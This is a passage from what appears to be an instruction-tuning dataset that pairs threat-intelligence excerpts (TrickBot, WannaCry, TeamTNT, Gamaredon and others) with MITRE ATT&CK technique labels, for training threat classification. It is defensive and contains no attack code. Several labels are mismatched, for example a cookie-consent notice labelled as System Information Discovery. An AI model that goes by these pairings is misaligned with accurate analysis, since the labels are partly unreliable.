achieve code execution via a malicious \"\"scriptlet\"\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"\"qrat.exe\"\" dropper from the current user's %tmp% directory. The file, named Microsoft.Win32.TaskScheduler.dll, is digitally signed by a certificate from AirVPN. Conclusion . The addition of US-based think tanks to the list of organizations in the crosshairs of Patchwork shows an increasing diversity in the geographic regions being targeted. Volexity is actively tracking this group and the infrastructure currently in use for the benefit of its network security monitoring and threat intelligence customers\"", + "output": "- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Apply the Microsoft security updates for MS17-010, including the updates for the Windows XP and Windows Server 2003 legacy operating systems. Disable SMBv1 on systems where it is not necessary (e.g. hosts that do not need to communicate with Windows XP and Windows 2000 systems). Carefully evaluate the need for allowing SMBv1-capable systems on interconnected networks compared to the associated risks. Scan networks for the presence of the DoublePulsar backdoor using plugins for tools such as Nmap. Use network auditing tools to scan networks for hosts that are vulnerable to the vulnerabilities described in MS17-010. Implement a backup strategy that includes storing data using offline backup media. Backups to locally connected, network-attached, or cloud-based storage are often insufficient because ransomware frequently accesses and encrypts files stored on these systems", + "output": "- T1490: Inhibit System Recovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SUPERNOVA is implemented as a modification to the existing \u2018app_web_logoimagehandler.ashx.b6031896.dll\u2019 module of the SolarWinds Orion application. The purpose of this module, in it\u2019s legitimate form, is to return the logo image configured by the user to various web pages of the SolarWinds Orion web application. In legitimate operation, this class only contains the ProcessRequest() and LogoImageHandler() methods, a private static Log object, and public boolean parameter IsReusable", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AgentTesla is a .Net-based infostealer that has the capability to steal data from different applications on victim machines, such as browsers, FTP clients, and file downloaders. One of the new modules that has been added to this malware is the capability to steal WiFi profiles", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TA551 has distributed different families of malware, including Ursnif (Gozi/ISFB), Valak and IcedID. TA551 malspam spoofs legitimate email chains based on data retrieved from previously infected Windows hosts. This is a generic statement asking the recipient to open an attached ZIP archive using the supplied password. For example, if the spoofed sender is someone@companyname.com, the ZIP attachment would be named companyname.zip. In 2020, we also started seeing emails with info.zip or request.zip as the attached ZIP archive names. These password-protected ZIP attachments contain a Word document with macros to install malware. File names for the extracted Word documents follow noticeable patterns that have evolved as this campaign has progressed. URLs generated by the associated Word macros also follow noticeable patterns that have also evolved as this campaign has progressed", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The plugins are variously designed to load other tools like Mimikatz or Carbanak, retrieve information from the victim machine, take screenshots, harvest credentials, retrieve browser histories, and more", + "output": "- T1217: Browser Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During our analysis, we successfully extracted the command line argument to execute its payload. The following command is used to execute the payload", + "output": "- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When receiving HTTP commands, the WellMess server is setup to receive POST requests that contain RC6 encrypted cookies. The server decrypts the cookies using a hardcoded RC6 key and expects the decrypted data to contain no more than four tags", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Despite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors \u2014 both for widespread and targeted operations. Recently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. The attacks have become more sophisticated, and have evolved to evade detection on a continual basis. Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. Simple campaigns typically use a single technique and often embed the final executable payload into the exploit document. The emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright", + "output": "- T1059.007: Command and Scripting Interpreter - JavaScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "IcedID uses TLS in all of its communication but the certificate is self-signed. They can be spotted, as they use this kind of a self-signed certificate. The keyword \u201cInternet Widgits Pty Ltd\u201d is also being used by Trickbot, another banking malware, and it is believed that Trickbot and IcedID are cousins", + "output": "- T1185: Browser Session Hijacking\n- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In December 2019, another version of the AppleJeus malware was identified on Twitter by a cybersecurity company based on many similarities to the original AppleJeus malware. In contrast, open-source reporting stated that the Windows version might have been downloaded via instant messaging service Telegram, as it was found in a \u201cTelegram Downloads\u201d folder on an unnamed victim", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerSploit can be used as a tool for the discovery of stored credentials. Specifically it supports the following modules which will check for credentials encrypted or plain-text in various files and in the registry", + "output": "- T1552.002: Unsecured Credentials - Credentials in Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MegaCortex v1 was executed manually by threat actors using a separate batch file to kill security processes and stop/disable services related to security, backup and shadow copies. That same batch file was subsequently used to execute the MegaCortex binary with a Base64 key as a command-line argument", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1489: Service Stop" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Capable of stealing documents sent to the printer queue. Data gathered for victim recon includes the backup list for Apple mobile devices. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The second family of Lazarus malware appearing in recent months has, as far as we are aware, received little to no analysis from researchers, possibly due to its targeted nature and a lack of ITW sightings", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These cookies are necessary for the website to function and cannot be switched off in our systems. They are usually only set in response to actions made by you which amount to a request for services, such as setting your privacy preferences, logging in or filling in forms. You can set your browser to block or alert you about these cookies, but some parts of the site will not then work. These cookies do not store any personally identifiable information", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "An uptick in activity from GRIM SPIDER, a subgroup of the criminal enterprise CrowdStrike Intelligence tracks as WIZARD SPIDER, has led to the identification of consistent actions employed to carry out their attacks. As part of their initial compromise \u2014 usually as a download from a spam email \u2014 they gain a foothold with their modular TrickBot malware, which was developed and is principally operated by WIZARD SPIDER. Once TrickBot is executed, new enumeration modules are downloaded onto the compromised machine to facilitate WIZARD SPIDER\u2019s spread in search of credentials with the aim of gaining access to the domain controller. The criminal actors use RDP to perform lateral movement and explore the victim environment, with an end result of gaining access to the domain controller. Once this access has been achieved, GRIM SPIDER is able to deploy the Ryuk ransomware to the entire network", + "output": "- T1021.001: Remote Services - Remote Desktop Protocol\n- T1204.002: User Execution - Malicious File\n- T1071.001: Application Layer Protocol - Web Protocols\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Unlike recent variants of Mirai and Gafgyt that target vulnerable Linux systems via randomly generated IP addresses, Xbash also scans and trawls through domain names. The C&C scans for specific destinations\u2019 known vulnerabilities in Hadoop, Redis and ActiveMQ (CVE-2016-3088) for self-propagation. Hadoop\u2019s unauthenticated command execution flaw discovered in October 2016, as well as the Redis arbitrary and remote command execution vulnerability disclosed in October 2015, have yet to be assigned CVE numbers. Based on the active C&C traffic, it scans and probes for open TCP or UDP ports such as HTTP, VNC, MySQL/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. While the malware uses a weak username and password dictionary to brute force itself into the service, it is also able to update its set from the C&C server, delete all the databases, and display the ransom message", + "output": "- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents. Tools linked to Gamaredon and discussed in this blogpost are detected as variants of MSIL/Pterodo, Win32/Pterodo or Win64/Pterodo by ESET\u2019s products. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. It also saves to disk the malicious OTM file (Outlook VBA project) that contains a macro, the malicious email attachment and, in some cases, a list of recipients that the emails should be sent to. Office macro injection module \u2013 CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. Module updates . Interestingly, some of the custom tools described in Palo Alto Networks\u2019 2017 blogpost on Gamaredon are still being updated and in use today. C# compiler module . This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. As with many other tools used by the Gamaredon group, they come in four different coding languages: C/C++, C#, batch file and VBScript. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "b.wnry \u2014 Bitmap image used as desktop wallpaper (shown in Figure 2) - c.wnry \u2014 Configuration containing Tor command and control (C2) addresses, Bitcoin addresses, and other data - r.wnry \u2014 Ransom demand text - s.wnry \u2014 ZIP archive containing Tor software to be installed on the victim\u2019s system; saved in TaskData directory - t.wnry \u2014 Encrypted DLL containing file-encryption functionality - u.wnry \u2014 Main module of the WCry ransomware \u201cdecryptor\u201d - taskdl.exe \u2014 WNCRYT temporary file cleanup program - taskse.exe \u2014 Program that displays decryptor window to RDP sessions - msg \u2014 Directory containing Rich Text Format (RTF) ransom demands in multiple languages", + "output": "- T1090.003: Proxy - Multi-hop Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment", + "output": "- T1021.004: Remote Services - SSH\n- T1090: Proxy\n- T1572: Protocol Tunneling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor. Part of this blog post will discuss the updates and differences we have observed across multiple versions of this backdoor", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "H1N1 has self-propagation/lateral movement functionality (which requires user interaction) via mapped/available network shares or mounted USB devices", + "output": "- T1080: Taint Shared Content" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Another component of the KGH suite is the m.dll module, which is an information stealer that harvest data from browsers, Windows Credential Manager, WINSCP and mail clients", + "output": "- T1114.001: Email Collection - Local Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Before the driver is loaded, the malware disables crash dump by setting the following registry key", + "output": "- T1112: Modify Registry\n- T1562.006: Impair Defenses - Indicator Blocking\n- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Conclusion Tick has left a trail of evidence indicating that its activity began as early as 2006. In earlier attacks, the group used malicious Microsoft Word documents to infect victims, with compromised websites being added to the mix as a more recent attack vector", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gathering system information and sending it to the control server. The system information gathered from the endpoint includes: MAC address of the endpoint Computer Name Product name from HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName This information is concatenated into a single string in the format: \u201cMAC_Address||ComputerName||ProductName\u201d and is sent to the control server - MAC address of the endpoint - Computer Name - Product name from HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName - This information is concatenated into a single string in the format: \u201cMAC_Address||ComputerName||ProductName\u201d and is sent to the control server - Recording HTTP requests from the control server to the temporary file prx in the implant\u2019s install directory with the current system timestamp", + "output": "- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Credential hopping for obscuring lateral movement - Office 365 (O365) Service Principal and Application hijacking, impersonation and manipulation - Stealing browser cookies for bypassing multifactor authentication - Use of the TrailBlazer implant and the Linux variant of GoldMax malware - Credential theft using Get-ADReplAccount", + "output": "- T1550.001: Use Alternate Authentication Material - Application Access Token\n- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the analyzed sample the RAT component was named \u201cBotDLL[.]dll\u201d. It has some typical RAT functionality such as command shell, video recording of the screen, remote desktop, port forwarding, and file system access", + "output": "- T1125: Video Capture\n- T1005: Data from Local System\n- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. It is capable of downloading and executing files, capturing screenshots and executing arbitrary commands on compromised systems", + "output": "- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Shortly after this RTF document is opened, the remaining stages of the Inception malware are found executing on the system. The loader DLL is responsible for decrypting and injecting the core payload DLL into memory, from an encrypted file present on disk. The core payload DLL's main function is to gather system information, execute other malware in the form of plugins, and update itself", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The NOKKI malware itself has been updated in the short period of time it has been observed, moving from FTP to HTTP for C2 operations. The malware is modular in nature, and based on analysis of the information gathering module, it is highly likely the NOKKI operators are the same as the KONNI operators", + "output": "- T1071.002: Application Layer Protocol - File Transfer Protocols\n- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The network mode being set to the host along with the container trying to be deployed as a privileged container. The Docker Hub account of MegawebMaster has numerous public images, five of which have TeamTNT utilities with a significant amount of downloads. These five images include dockgeddon, docker, tornadopw, and dcounter (T1204.003", + "output": "- T1496: Resource Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TeamTNT has also been spotted using a malicious Docker image which can be found on Docker Hub to infect its victims\u2019 servers", + "output": "- T1071.001: Application Layer Protocol - Web Protocols\n- T1610: Deploy Container" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Even simple API calls were obfuscated, and instead of just calling the functions, Siloscape made the effort to use the Native API (NTAPI) version of the same function", + "output": "- T1027: Obfuscated Files or Information\n- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The DLL expects the export named 'Add' to be used when initially loaded. When this function is executed PLAINTEE executes the following command in a new process to add persistence", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this version, the communication protocol with the C&C server was also upgraded to use AES encryption", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. It has the capability to find files, enumerate drives, 